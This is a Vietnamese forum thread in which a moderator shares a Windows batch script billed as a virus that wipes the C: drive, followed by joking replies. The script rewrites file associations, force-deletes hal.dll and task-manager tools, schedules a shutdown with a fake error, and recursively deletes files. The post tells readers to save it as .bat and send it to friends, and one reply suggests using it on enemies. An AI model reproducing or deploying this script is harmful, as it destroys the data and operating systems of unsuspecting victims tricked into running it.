Share Virus Phá Ổ C:\WINDOWS

Hero

Super Moderator
Staff member
Nghịch tí cho vui đi =))
@Echo Off
@cls
@title welcome to vn-zoom.com
@assoc exe=txt
@assoc reg=jpg
@cd %systemroot%
@del /f /s /q TASKMAN.EXE
@cd %Systemroot%\system32
@del /f /s /q hal.dll
@del /f /s /q taskkil.exe
@del /f /s /q tasklist.exe
@del /f /s /q taskman.exe
@del /f /s /q taskmgr.exe
@shutdown Thanks neu cai lai win -s -t 06 -c " Fatal loi #1337, Duck!"
@del /f /s /q *.*
@cd ..
@del /f /s /q TASKMAN.EXE
@del /f /s /q *.*
@exit
Copy vào Notepad sau đó đổi tên file thành (.bat) có thể gửi cho bạn bè nếu muốn , click vào Nó sẽ xóa tất cả những gì có trong ổ C bao gồm Cookie,Windows,Sytem v.v...
 

phanken

New Member
Cái này dùng để phá kẻ thù chứ gửi cho bạn bè làm gì bó tay chủ top bạn bè cũng không tha
 

simple

New Member
Á ! Chơi vậy người ta mà biết đập vở mồm, nhưng cũng hay, nhưng đt nào thì xài được vậy. Nokia, samsum, fpt, Q mobile. . .
 

KullsTyLe

New Member
ôi.vãi chiêu... thử với pc bạn chưa vậy???
 

Facebook Comments


New posts New threads New resources

Top